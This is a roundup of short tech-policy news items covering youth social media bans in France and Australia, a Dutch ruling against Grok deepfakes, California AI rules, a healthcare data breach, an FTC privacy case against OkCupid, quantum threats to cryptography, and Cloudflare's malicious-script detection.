France moves toward social media restrictions for children under 15

Legislative efforts in France signal a shift toward stricter governance of youth access to digital platforms, with policymakers preparing to debate a ban on social media use for children under 15.

A proposal that forms part of a broader strategy to address concerns over online harms and excessive screen exposure among adolescents.

The draft law in France extends beyond access restrictions, proposing a digital curfew for older teenagers and expanding existing school phone bans to include high schools.

These measures reflect increasing reliance on regulatory intervention instead of voluntary platform safeguards, as evidence links prolonged digital engagement with risks such as cyberbullying, disrupted sleep patterns and exposure to harmful content.

Political backing for the initiative has emerged from figures aligned with Emmanuel Macron, reinforcing the government’s position that stronger oversight of digital environments is necessary. The proposal also mirrors developments in Australia, where similar restrictions have already entered into force.

A debate that is further influenced by legal actions targeting major platforms, including TikTok and Meta, amid allegations that algorithmic systems contribute to harmful user experiences.

The outcome of the parliamentary discussions in France is expected to shape future approaches to child safety, platform accountability and digital rights governance across Europe.

Would you like to learn more about AI, tech and digital diplomacyIf so, ask our Diplo chatbot!  

Dutch court bans harmful Grok AI-generated images

A judge in Amsterdam has ordered AI chatbot Grok and platform X to stop generating and distributing explicit deepfake images. The ruling targets so-called ‘undressing’ content and illegal material involving minors.

The case was brought by Offlimits, which argued that safeguards were failing. The Dutch judges found sufficient evidence that harmful images could still be created despite existing restrictions.

The court imposed a penalty of €100,000 per day for violations, with a maximum of €10 million. Access to Grok on X must also be suspended if the system does not comply with the order.

The decision highlights growing legal pressure on AI platforms to control the misuse of generative tools. Regulators and courts are increasingly demanding stronger protections against online abuse and illegal content.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot

California challenges federal approach with new AI rules

The government of California is advancing a more interventionist approach to AI governance, signalling a divergence from federal deregulatory preferences.

An executive order signed by Gavin Newsom mandates the development of comprehensive AI policies within 4 months, prioritising public safety and protecting fundamental rights.

The proposed framework requires companies seeking state contracts to demonstrate safeguards against harmful outputs, including the prevention of child exploitation material and violent content.

It also calls for measures addressing algorithmic bias and unlawful discrimination, alongside increased transparency through mechanisms such as watermarking AI-generated media.

Federal guidance has discouraged state-level intervention, framing such efforts as obstacles to technological leadership.

The evolving policy landscape reflects growing concern over the societal impact of AI systems, including risks to employment, content integrity and civil liberties.

An initiative by California that may therefore serve as a testing ground for future regulatory models, shaping broader debates on balancing innovation with accountability in digital governance.

Would you like to learn more about AI, tech and digital diplomacyIf so, ask our Diplo chatbot!  

Healthcare data breach raises concerns over cloud security

A cybersecurity incident involving CareCloud has exposed vulnerabilities in the protection of sensitive medical information, following unauthorised access to patient records stored within its systems.

A breach was detected on 16 March, allowing attackers to access electronic health records for several hours, which raised concerns about potential data exposure.

The company has stated that the intrusion was contained on the same day, with systems restored and an external investigation launched.

However, uncertainty remains about whether any data were extracted and the scale of the potential impact, particularly given the company’s role in supporting tens of thousands of healthcare providers and millions of patients.

Such an incident reflects broader structural risks within digital healthcare infrastructures, where centralised storage of highly sensitive data increases the potential impact of cyberattacks.

Cloud environments, including services provided by Amazon Web Services, are increasingly integral to such systems, amplifying both efficiency and exposure.

The breach follows a pattern of escalating cyber threats targeting healthcare data, driven by its high value in criminal markets.

As investigations continue, the case underscores the need for stronger data protection measures, enhanced monitoring systems and more robust regulatory oversight to safeguard patient information.

Would you like to learn more about AI, tech and digital diplomacyIf so, ask our Diplo chatbot!  

Australia reviews compliance with under-16 social media age ban

Australia’s eSafety Commissioner has released an update on rules requiring platforms to prevent users under 16 from holding accounts. Early results show significant action by companies, but also ongoing challenges in fully enforcing the restrictions.

By mid-December 2025, around 4.7 million accounts were removed or restricted, with more than 300,000 additional accounts blocked by March 2026. Despite these reductions, many children continue to retain accounts, create new ones, or pass age assurance checks.

Regulators identified several compliance concerns, including platforms that allow repeated attempts at age verification and encourage some users to update their ages. Reporting systems for underage accounts were often difficult to access, particularly for parents.

Investigations into five major platforms are ongoing to determine whether they have taken reasonable steps to meet their legal obligations. Authorities are assessing systems and processes rather than individual accounts, with enforcement decisions expected by mid-2026.

A new legislative rule introduced in March 2026 targets platform features linked to potential harm, such as recommender systems and continuous content feeds. Regulators will continue working with industry while gathering evidence and maintaining transparency during the enforcement process.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot 

EU boosts fact-checking with €5 million disinformation resilience plan

The European Commission has committed €5 million to strengthen independent fact-checking networks, reinforcing efforts to counter disinformation across Europe. The initiative seeks to expand verification capacity in all EU languages while improving coordination among key stakeholders.

The programme introduces a comprehensive support system for fact-checkers, covering legal assistance, cybersecurity protection and psychological support.

It also establishes a centralised European repository of verified information, designed to enhance transparency and improve access to reliable content across the EU.

Led by the European Fact-Checking Standards Network, the project builds on existing frameworks such as the European Digital Media Observatory. The initiative forms part of the EU’s broader strategy to strengthen information integrity and safeguard democratic processes.

By reinforcing independent verification ecosystems, the programme reflects a policy-driven effort to address disinformation threats while supporting a more resilient and trustworthy digital environment across Europe.

Would you like to learn more about AI, tech and digital diplomacyIf so, ask our Diplo chatbot!  

FTC accuses OkCupid of sharing user data contrary to privacy promises

The US Federal Trade Commission has taken action against OkCupid and Match Group Americas over allegations that the dating app shared users’ personal information, including photos and location data, with an unrelated third party despite privacy promises saying such sharing would not occur without notice or an opportunity to opt out.

According to the FTC’s complaint, OkCupid gave the third party access to personal data from millions of users even though the recipient was not a service provider, business partner, or affiliate within the company’s corporate family. The agency says consumers were not informed and were not given a chance to opt out.

The complaint says the third party sought large OkCupid datasets because OkCupid’s founders were financial investors in that company, despite there being no business relationship with the app. The FTC alleges that OkCupid provided access to nearly 3 million user photos, along with location and other information, without formal or contractual limits on how the data could be used.

Christopher Mufarrige, Director of the FTC’s Bureau of Consumer Protection, said: ‘The FTC enforces the privacy promises that companies make. We will investigate, and where appropriate, take action against companies that promise to safeguard your data but fail to follow through—even if that means we have to enforce our Civil Investigative Demands in court.’

The FTC also alleges that, since September 2014, Match and OkCupid have taken extensive steps to conceal and deny that the apps shared users’ personal information with the data recipient, including conduct the agency says obstructed its investigation. One example cited in the complaint is that, after a news report revealed the third party had obtained large OkCupid datasets, the company told the media and users that it was not involved with that third party.

Under the proposed settlement, OkCupid and Match would be permanently prohibited from misrepresenting how they collect, maintain, use, disclose, delete, or protect personal information, including photos, demographic data, and geolocation data. Restrictions would also cover how they describe the purposes of data collection and disclosure, as well as how they present privacy controls and consumer choices under state privacy laws.

The Commission vote authorising staff to file the complaint and stipulating the final order was 2-0. The FTC filed both in the US District Court for the Northern District of Texas, Dallas Division. The agency notes that a complaint reflects its view that it has ‘reason to believe’ the law has been or is about to be violated, while stipulated final orders carry the force of law only if approved and signed by the district court judge.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

New quantum threat could weaken cryptocurrency encryption systems

A new warning from Google says advances in quantum computing could weaken widely used cryptographic systems protecting cryptocurrencies and digital infrastructure. A new whitepaper suggests future quantum machines may need fewer resources than previously estimated to break elliptic curve cryptography.

The research focuses on the elliptic curve discrete logarithm problem, which underpins much of today’s blockchain security. Findings suggest quantum algorithms like Shor’s could run with fewer qubits and gates, increasing concerns about cryptographic resilience.

To address the risk, the paper recommends a transition to post-quantum cryptography, which is designed to resist quantum attacks. It also outlines short-term blockchain measures, including avoiding reuse of vulnerable wallet addresses and preparing digital asset migration strategies.

Google also introduced a responsible disclosure approach using zero-knowledge proofs to communicate vulnerabilities without exposing exploitable details.

The company says this balances transparency and security, supporting coordinated efforts across crypto and research communities to prepare for quantum threats.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot

Cloudflare adds LLM layer to client-side security detection pipeline

Cloudflare has announced two changes to its client-side security offering, making Client-Side Security Advanced available to self-serve customers and offering domain-based threat intelligence at no extra cost to all users on the free Client-Side Security bundle. The update is focused on browser-based attacks that can steal data via malicious scripts without visibly disrupting a website’s normal operation.

Cloudflare says its client-side security system assesses 3.5 billion scripts per day and monitors an average of 2,200 scripts per enterprise zone. According to the company, the product relies on browser reporting, including Content Security Policy signals, rather than scanners or application instrumentation, and requires only that traffic be proxied through Cloudflare.

A central part of the announcement is a new detection pipeline combining a Graph Neural Network (GNN) with a Large Language Model (LLM). Cloudflare says the GNN analyses the Abstract Syntax Tree of JavaScript code to identify malicious intent even when scripts are minified or obfuscated. Scripts flagged as suspicious are then passed to an open-source LLM running on Workers AI for a second-stage semantic assessment intended to reduce false positives.

Cloudflare says the GNN is tuned for high recall to identify novel and zero-day threats, but that false alarms remain a challenge at internet scale. Internal evaluation results cited by the company show that the secondary LLM layer reduced false positives in the JS Integrity threat category by nearly three times across the total analysed traffic, lowering the rate from about 0.3% to about 0.1%. On unique scripts, Cloudflare says the false-positive rate fell from about 1.39% to 0.007%.

The company also describes a recent case involving a heavily obfuscated malicious script named core.js. According to Cloudflare, the payload targeted Xiaomi OpenWrt-based home routers, altered DNS settings, and attempted to change admin passwords. Cloudflare says the script was injected through compromised browser extensions rather than by directly compromising a website, and adds that its GNN detected the malicious structure while the LLM confirmed the intent.

Cloudflare argues that the two-stage design provides structural detection via the GNN and broader semantic filtering via the LLM, enabling the company to lower the GNN decision threshold without sharply increasing alert volume. Every script flagged by the GNN is also logged to Cloudflare R2 for later auditing, which the company says helps it review cases where the LLM overrode the initial verdict.

Domain-based threat intelligence is now being made available to all Client-Side Security customers, including those not using the Advanced tier. Cloudflare says the move is partly a response to attacks seen in 2025 against smaller online shops, especially on Magento, where client-side compromises continued for days or weeks after public disclosure. By extending domain-based signals more broadly, the company says site owners can more quickly identify malicious JavaScript or suspicious connections and investigate possible compromises.

Would you like to learn more about AI, tech, and digital diplomacy? If so, ask our Diplo chatbot!

Technology reshapes pensions engagement

New technology is reshaping how people engage with pensions, according to Financial Conduct Authority chief executive Nikhil Rathi. Speaking in London, he highlighted the growing role of AI and digital tools in helping savers better understand their retirement finances.

Pensions dashboards are expected to give millions a clearer view of their savings, potentially driving greater engagement and behavioural change. Increased visibility may encourage actions such as consolidating pension pots or adjusting contributions.

London officials warn that stronger engagement brings risks as well as opportunities, with many consumers still lacking clear retirement plans. Policymakers aim to balance protection with flexibility, promoting informed decisions while avoiding overly restrictive systems.

Advances in AI are also enabling more personalised financial guidance, making it easier for users to explore retirement scenarios. Experts say the future of pensions will depend on integrating savings, housing and wider financial planning into a more connected system.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot